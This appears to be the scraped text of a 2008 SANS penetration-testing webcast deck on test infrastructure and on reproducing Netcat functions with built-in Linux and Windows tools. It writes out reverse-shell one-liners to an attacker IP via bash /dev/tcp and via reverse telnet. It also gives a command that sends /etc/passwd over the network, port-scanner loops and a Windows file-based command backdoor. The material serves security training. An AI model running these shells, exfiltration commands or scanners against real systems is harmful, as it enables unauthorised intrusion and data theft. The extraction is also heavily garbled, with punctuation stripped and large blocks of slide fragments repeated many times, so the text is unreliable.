penetration testing ninjitsu2 infrastructure and netcat without netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 1

Penetration Testing Ninjitsu 2Crouching Netcat Hidden Vulnerabilities

Copyright 2008 SANS

Version 2Q08

By Ed Skoudis






Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA


httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4

Building an Infrastructure for

Ethical Hackingbull Before starting a test you need an

infrastructure including ndash Software

ndash Hardware

ndash Network infrastructure

bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it

ndash But it is a reasonable starting point

ndash Wersquoll focus on software and network stuff



Linux vs Windowsbull Should you concentrate on Linux or Windows Yes

bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them

bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work

ndash Not two different toolboxes but one toolbox with twodifferent compartments

bull Is Mac OS X acceptable

ndash Itrsquos OK but you should have virtual Windows and Linux



Software for Testing ndash

Free Test Tools

bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work

ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml

bull Other free sources of tools

ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc

ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools



Commercial Toolsbull There are numerous useful commercial tools

available for pen testers providing ndash Typically higher quality and more frequent updates

ndash Support ndash very important for professional testing

bull Useful examples include ndash CORE IMPACT ndash OS network services client-side

and web app exploitation

ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan

ndash HP SPI Dynamicsrsquo WebInspect ndash web app

vulnerability discovery and exploit



Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock



Outline



bull QampA




What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network




What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip




What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL




Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it




Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows




Linuxbull devtcp rocks

bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]

ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for

Netcat-like behavior




Linux Command-Line File

Transfer

bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in

bull $ cat etcpasswd gt

devtcp[IPaddr][port]bull Catch it on the other side with a Netcat

listener




Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here




Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t




Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening




Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d




Command-Line Port Scanner

In Action

5 Not Closed




Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2




Reverse Telnet Shell in Action




Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows




Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using





Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d




More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i





FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li




The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results




Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer




Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files




File Transfer in Action




Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001




Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands




The File Shell In Action




Outline



bull QampA




Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up




Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details




Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008






Outline



bull QampA






ndash Hardware
















Free Test Tools


















Testing Network










Outline



bull QampA




What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA







ndash Hardware
















Free Test Tools


















Testing Network










Outline



bull QampA




What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA













Free Test Tools


















Testing Network










Outline



bull QampA




What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA














Testing Network










Outline



bull QampA




What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA




Outline



bull QampA




What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA





What is Netcat






Std In Send packets

Std Err

The

System

The

Network





bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA






bull Port scan



bull Simple chats















bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA













bull YOU WILL










Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA











Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA









ndash File transfer

ndash Port scanner














Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA













Transfer




listener




Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA





Linux Command-Line



binbash ndashi gt


2gtamp1


binbash ndashi gt

devtcp

[Attacker_IPaddr]


Firewall

Blocks

incoming


TYPE COMMANDS

HERE

Commands

executed

here






Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA







Li C d Li P t

















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA


















pen testers

d





In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA






In Action

5 Not Closed




Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA





Linux Command-Line



Standard Out




















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA

















Building Blocks



itemsbull Numbers

















M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA












M P bl ith Wi d












Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA













Wi d P t S U i












Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA













Th Wi d C d Li














(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA















(111024) do

echo Checking

Port i gtgt


gt ftptxt amp echo


2gtgtportstxt








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA








































Outline



bull QampA










Follo Up





and Ethical Hacking













bull Conclusions

bull QampA











Follo Up





and Ethical Hacking













bull Conclusions

bull QampA






and Ethical Hacking













bull Conclusions

bull QampA







bull Conclusions

bull QampA


penetration testing ninjitsu2 infrastructure and netcat without netcat

Documents